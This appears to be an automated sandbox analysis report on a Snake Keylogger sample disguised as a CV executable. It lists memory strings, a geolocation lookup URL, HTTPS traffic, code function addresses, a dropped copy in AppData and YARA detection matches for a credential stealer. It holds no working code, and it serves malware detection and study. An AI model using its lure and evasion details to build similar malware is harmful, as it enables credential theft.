Source: Kayla Dennis CV.exe, 00000000.00000002.2131860326.0000000003421000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, lyKbfEsVYfQfU.exe, 0000000C.00000002.2224356364.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 0000000B.00000002.3288992952.000000000313C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000312F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003193000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003158000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003185000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000314A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000309C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C33000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B8D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BF8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BEA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Kayla Dennis CV.exe, 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000309C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000011.00000002.3289778566.0000000002BEA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187
Source: RegSvcs.exe, 0000000B.00000002.3288992952.000000000313C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000312F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003193000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003158000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003185000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.000000000314A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C33000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002B8D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BF8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002BEA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187$
Source: Kayla Dennis CV.exe, lyKbfEsVYfQfU.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: Kayla Dennis CV.exe, lyKbfEsVYfQfU.exe.0.dr	String found in binary or memory: https://www.google.com/#q=

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.Kayla Dennis CV.exe.44978d8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Kayla Dennis CV.exe.44978d8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Kayla Dennis CV.exe.44978d8.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Kayla Dennis CV.exe.44978d8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: Kayla Dennis CV.exe PID: 6300, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Kayla Dennis CV.exe PID: 6300, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 7364, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7364, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Code function: 0_2_07D716F8	0_2_07D716F8
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Code function: 0_2_07D716E7	0_2_07D716E7
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Code function: 0_2_07D7A3CB	0_2_07D7A3CB
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Code function: 0_2_07D73033	0_2_07D73033
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Code function: 0_2_07D79FA0	0_2_07D79FA0
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Code function: 0_2_07D7BEE8	0_2_07D7BEE8
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Code function: 0_2_07D7AC48	0_2_07D7AC48
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Code function: 0_2_07D7A810	0_2_07D7A810
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Code function: 0_2_07D7A800	0_2_07D7A800
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Code function: 0_2_0B1D1F58	0_2_0B1D1F58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_012F6108	11_2_012F6108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_012FC198	11_2_012FC198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_012FC470	11_2_012FC470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_012FB4A0	11_2_012FB4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_012F6730	11_2_012F6730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_012FC754	11_2_012FC754
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_012F9858	11_2_012F9858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_012FBBDC	11_2_012FBBDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_012FCA34	11_2_012FCA34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_012F4AD9	11_2_012F4AD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_012FBEB0	11_2_012FBEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_012F3578	11_2_012F3578
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Code function: 12_2_079916F8	12_2_079916F8
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Code function: 12_2_079916E7	12_2_079916E7
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Code function: 12_2_0799A3CA	12_2_0799A3CA
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Code function: 12_2_07993033	12_2_07993033
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Code function: 12_2_07999EC8	12_2_07999EC8
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Code function: 12_2_0799BEE8	12_2_0799BEE8
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Code function: 12_2_0799AC48	12_2_0799AC48
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Code function: 12_2_0799A810	12_2_0799A810
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Code function: 12_2_0799A800	12_2_0799A800
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Code function: 12_2_0B030FC7	12_2_0B030FC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01016108	17_2_01016108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0101C190	17_2_0101C190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0101B328	17_2_0101B328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0101C470	17_2_0101C470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01016730	17_2_01016730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0101C751	17_2_0101C751
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01019858	17_2_01019858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0101BBD2	17_2_0101BBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0101CA31	17_2_0101CA31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01014AD9	17_2_01014AD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0101BEB0	17_2_0101BEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01013570	17_2_01013570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0101B4F3	17_2_0101B4F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_05635488	17_2_05635488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_056399A8	17_2_056399A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0563A0D0	17_2_0563A0D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_05632568	17_2_05632568
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0563D548	17_2_0563D548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0563D558	17_2_0563D558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_05632558	17_2_05632558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0563DDF9	17_2_0563DDF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_05635478	17_2_05635478
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_05631CA8	17_2_05631CA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_05631C99	17_2_05631C99
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0563EF68	17_2_0563EF68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0563EF58	17_2_0563EF58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_05638FF0	17_2_05638FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_05639788	17_2_05639788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0563DE08	17_2_0563DE08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0563E6A8	17_2_0563E6A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0563E6B8	17_2_0563E6B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0563D100	17_2_0563D100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_05632108	17_2_05632108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_056329C8	17_2_056329C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0563D9A1	17_2_0563D9A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0563D9B0	17_2_0563D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_056329B8	17_2_056329B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0563A076	17_2_0563A076
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_05630040	17_2_05630040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_05631848	17_2_05631848
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_05631838	17_2_05631838
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_05639000	17_2_05639000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_05630007	17_2_05630007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0563F80A	17_2_0563F80A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0563F818	17_2_0563F818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0563D0EF	17_2_0563D0EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_056320F9	17_2_056320F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_05630B30	17_2_05630B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0563EB02	17_2_0563EB02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0563EB10	17_2_0563EB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_05630B1F	17_2_05630B1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0563F3C0	17_2_0563F3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0563F3B1	17_2_0563F3B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0563E260	17_2_0563E260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0563E250	17_2_0563E250

Source: Kayla Dennis CV.exe

Static PE information: invalid certificate

Source: Kayla Dennis CV.exe, 00000000.00000002.2131860326.0000000003421000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Kayla Dennis CV.exe
Source: Kayla Dennis CV.exe, 00000000.00000002.2133658014.0000000004632000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Kayla Dennis CV.exe
Source: Kayla Dennis CV.exe, 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Kayla Dennis CV.exe
Source: Kayla Dennis CV.exe, 00000000.00000002.2141144044.00000000068F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs Kayla Dennis CV.exe
Source: Kayla Dennis CV.exe, 00000000.00000002.2142467699.00000000084F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Kayla Dennis CV.exe
Source: Kayla Dennis CV.exe, 00000000.00000002.2126394487.000000000160E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Kayla Dennis CV.exe
Source: Kayla Dennis CV.exe	Binary or memory string: OriginalFilenameXDRa.exe: vs Kayla Dennis CV.exe

Source: Kayla Dennis CV.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Kayla Dennis CV.exe.44978d8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Kayla Dennis CV.exe.44978d8.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Kayla Dennis CV.exe.44978d8.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Kayla Dennis CV.exe.44978d8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
